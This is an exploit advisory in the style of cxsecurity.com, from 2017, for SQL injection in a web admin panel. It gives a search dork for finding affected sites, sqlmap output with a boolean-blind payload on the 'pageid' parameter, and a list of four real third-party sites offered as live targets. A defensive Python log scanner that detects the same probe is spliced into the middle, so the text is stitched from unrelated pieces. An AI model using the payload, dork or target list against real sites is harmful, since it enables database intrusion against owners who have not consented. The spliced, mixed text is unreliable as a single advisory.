IN ADMIN PANEL SQL injection Vulnerability

Published: 2017.03.11
Credit: xBADGIRL21
Risk: Medium
CWE: CWE-89
CVE: N/A
Local: No
Remote: Yes
Dork: IN ADMIN PANEL | Powered by INDEZINER

##############################
# [xBADGIRL21] #
# [N3W PUBLIC 3XPL0IT] #
# _,________ #
# 0day _T _==____() -- #
# /##(_)-' #
# /##/ #
# x21 #
##############################
# Exploit Title : IN ADMIN PANEL SQL injection Vulnerability
# Exploit Author : xBADGIRL21
# Dork : IN ADMIN PANEL | Powered by INDEZINER
# Vendor : http://indeziner.com/
# Tested on: [WIN7]
# MyBlog : http://xbadgirl21.blogspot.com
# Date: 10-03-2017
# video Proof : https://youtu.be/G7KBC07JS_U
[*] To buy or Donate my BTC: 1Bgqu8faM8SPrArjoWRofRaTbMdes16mRz
######################
#|X|B|A|D|G|I|R|L|2|1|
######################
# [+] Poc :
######################
# [pageid] Get Parameter Vulnerable To SQLi
#
http://127.0.0.1/ALLperematers.php Vuln
######################
# [+] SQLmap PoC:
######################
GET parameter 'pageid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 105 HTTP(s) requests:
---
Parameter: pageid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pageid=7 AND 9360=9360
---
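A defender-side check for the probe shape the sqlmap output above reports, added here as an example that is not part of the advisory: it parses access-log lines, percent-decodes the query string, flags an `AND n=m` comparison appended to a numeric parameter such as `pageid`, and pairs a client's true and false probes together with the response-size difference that boolean-based blind injection keys on. The log lines, client addresses and the `sqlmap/1.1` user-agent string are constructed sample data.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-format access-log lines; not taken from the advisory.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2017:14:02:11 +0000] "GET /contact.php?pageid=7 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2017:14:02:12 +0000] "GET /contact.php?pageid=7%20AND%209360%3D9360 HTTP/1.1" 200 5120 "-" "sqlmap/1.1"
203.0.113.5 - - [10/Mar/2017:14:02:12 +0000] "GET /contact.php?pageid=7%20AND%209360%3D9361 HTTP/1.1" 200 1830 "-" "sqlmap/1.1"
198.51.100.9 - - [10/Mar/2017:14:05:40 +0000] "GET /contact.php?pageid=8 HTTP/1.1" 200 4990 "-" "Mozilla/5.0"
"""

# Fields of the combined-log request line we need: client IP, method, target, status, response size.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" '
                        r'(?P<status>\d{3}) (?P<size>\d+|-)')
# Shape of the boolean-blind probe in the advisory: a value followed by AND/OR <number>=<number>.
PROBE_RE = re.compile(r"\b(?:and|or)\b\s+(?P<lhs>\d+)\s*=\s*(?P<rhs>\d+)", re.IGNORECASE)

def classify_value(value):
    """'true' for a tautology (9360=9360), 'false' for a contradiction (9360=9361), else None."""
    m = PROBE_RE.search(value)
    if m is None:
        return None
    return "true" if m.group("lhs") == m.group("rhs") else "false"

def scan_log(text):
    """One finding per request whose (percent-decoded) query-string value carries a probe."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if m is None:
            continue  # not a request line we understand; skip rather than crash on malformed input
        parts = urlsplit(m.group("target"))
        size = int(m.group("size")) if m.group("size").isdigit() else 0
        for param, values in parse_qs(parts.query, keep_blank_values=True).items():
            for value in values:  # parse_qs already percent-decodes, so %3D is seen as '='
                verdict = classify_value(value)
                if verdict is not None:
                    findings.append({"ip": m.group("ip"), "path": parts.path, "param": param,
                                     "verdict": verdict, "size": size})
    return findings

def boolean_blind_pairs(findings):
    """Group by (ip, path, param) and keep groups that sent both a true and a false probe.
    size_delta is the response-size difference an attacker keys on; 0 suggests the probe failed."""
    groups = {}
    for f in findings:
        groups.setdefault((f["ip"], f["path"], f["param"]), {})[f["verdict"]] = f["size"]
    return [{"ip": ip, "path": path, "param": param, "size_delta": abs(g["true"] - g["false"])}
            for (ip, path, param), g in groups.items() if "true" in g and "false" in g]
```

Run `boolean_blind_pairs(scan_log(SAMPLE_LOG))` on the sample to get the one paired probe against `pageid` with a 3290-byte response difference; a single tautology with no matching contradiction is still reported by `scan_log` but not paired.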
######################
# [!] Live Demo :
######################
# http://www.hatchdesign.co/contact.php?pageid=7
# http://www.arnistonguesthouse.com/content/news-detail-arniston-guest-house-south-africa.php?NewsID=9
# http://www.highwaychurch.co.za/content/news-details-highway-church-centurion-south-africa.php?NewsID=31
# http://www.whitecollars.in/page.php?id=412
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanian Hackers - NoWhere
######################

References:

https://youtu.be/G7KBC07JS_U


Copyright 2017, cxsecurity.com